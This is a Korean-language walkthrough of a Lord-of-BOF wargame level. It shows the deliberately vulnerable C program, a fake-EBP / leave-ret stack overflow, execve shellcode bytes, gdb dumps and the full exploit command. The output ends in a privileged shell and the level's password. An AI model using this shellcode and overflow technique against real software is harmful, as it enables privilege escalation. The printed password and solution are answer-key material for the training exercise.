[16] assassin -> zombie_assassin ( Fake EBP & leaveret )

2017. 11. 20. 21:09 | SystemHacking/LOB(BOF원정대)


assassin / pushing me away

[assassin@localhost assassin]$ /bin/bash2

[assassin@localhost assassin]$ export SHELL=/bin/bash2



[ zombieassassin.c ]

 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
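/*
 * zombie_assassin (LOB level 16): echo argv[1] through a fixed-size stack
 * buffer.  The copy is deliberately 8 bytes longer than the buffer; the two
 * address checks on byte 47 are the only mitigation this level applies.
 *
 * argv[1] : untrusted command-line string.  Note that argc >= 2 does not
 *           guarantee it is 48 bytes long, so argv[1][47] can read past the
 *           terminating NUL of a short argument.
 * Returns : 0 after printing the buffer; exit(0) on rejected input.
 */
int main(int argc, char *argv[])
{
        char buffer[40];

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        /* Byte 47 is the most significant byte of the saved-eip slot
           (buffer[40] + saved ebp[4] + saved eip[4], little-endian).
           0xbf = a stack address -> refuse a direct return onto the stack. */
        if(argv[1][47] == '\xbf')
        {
                printf("stack retbayed you!\n");
                exit(0);
        }

        /* 0x40 = a shared-library address -> refuse return-to-libc. */
        if(argv[1][47] == '\x40')
        {
                printf("library retbayed you, too!!\n");
                exit(0);
        }

        // strncpy instead of strcpy!
        /* 48 bytes into a 40-byte buffer: the overrun is bounded but still
           covers the saved ebp (bytes 40..43) and saved eip (bytes 44..47).
           strncpy also leaves buffer without a NUL when argv[1] is 48 bytes
           or longer, so the printf below may read beyond it. */
        strncpy(buffer, argv[1], 48);
        printf("%s\n", buffer);
        return 0;
}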
 


hint : Fake EBP


[ Stack ]

buffer 40byte

saved ebp         4byte

saved eip         4byte <-- no stack, no RTL (the 0xbf / 0x40 checks on byte 47)


[ Stack ] : Fake EBP 공격

buffer &shellcode

saved ebp     &buffer+4

saved eip         &leaveret

   .... 


1> main leave

mov esp,ebp

pop ebp => EBP: Fake EBP


2> main ret

pop eip => EIP: &leaveret


3> leave

mov esp,ebp => ESP: Fake EBP(&buffer+4)

pop ebp => EBP: &buffer+4에 있는 값


4> ret

pop eip => EIP: &buffer 

 => buffer에 위치한 쉘 코드가 실행된다 !



* &leaveret

0x80484df <main+159>:   leave


* 24byte shellcode

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80


[ gdb 분석 ]

[assassin@localhost assassin]$ cp zombie_assassin zombie_assassin.cp

[assassin@localhost assassin]$ gdb -q zombie_assassin.cp

(gdb) set disassembly-flavor intel

(gdb) disas main

0x8048440 <main>:       push   %ebp

0x8048441 <main+1>:     mov    %ebp,%esp

0x8048443 <main+3>:     sub    %esp,40

... (생략) ...

0x80484df <main+159>:   leave

(gdb) run $(python -c 'print "\x90" * 16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "BBBB" + "CCCC"')

Breakpoint 1, 0x80484df in main ()   (breakpoint at main+159 = leave, set before run; the break command is not shown)

(gdb) x/24x $ebp-40

0xbffffaa0:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffab0:     0x6850c031      0x68732f2f      0x69622f68      0x50e3896e

                                                fake ebp (0x42424242)   saved eip (0x43434343)  <- in the row below

0xbffffac0:     0x99e18953      0x80cd0bb0      0x42424242      0x43434343

0xbffffad0:     0x00000002      0xbffffb14      0xbffffb20      0x40013868


* fake ebp 지점의 값을 0xbffffaa0 - 4 로 변조

* saved eip 지점의 값은 &leaveret 주소로 변조

$(python -c 'print "\x90" * 16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x9c\xfa\xff\xbf" + "\xdf\x84\x04\x08"')


[ Payload 작성 ]


* &leaveret

0x80484df <main+159>:   leave


* 24byte shellcode

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80


=> 주소값 보정작업 : fake ebp 값이 조금 변했다 (gdb 에서의 0xbffffa9c → 실제 실행 시 0xbffffa98). 보정 후 값은 gdb 기준 &buffer-8 에 해당하는데, leave-ret 가젯의 ret 이 fake ebp+4 (= &buffer-4) 에 있는 값을 eip 로 pop 하고 그 자리에는 printf 호출 때 push 된 buffer 주소가 남아 있기 때문으로 보인다.

[assassin@localhost assassin]$./zombie_assassin $(python -c 'print "\x90"*16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x98\xfa\xff\xbf" + "\xdf\x84\x04\x08"')

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒Ph//shh/bin▒▒PS▒ᙰ

                                   ̀▒▒▒▒߄

bash$ id

uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassin)

bash$ my-pass

euid = 516

no place to hide

bash$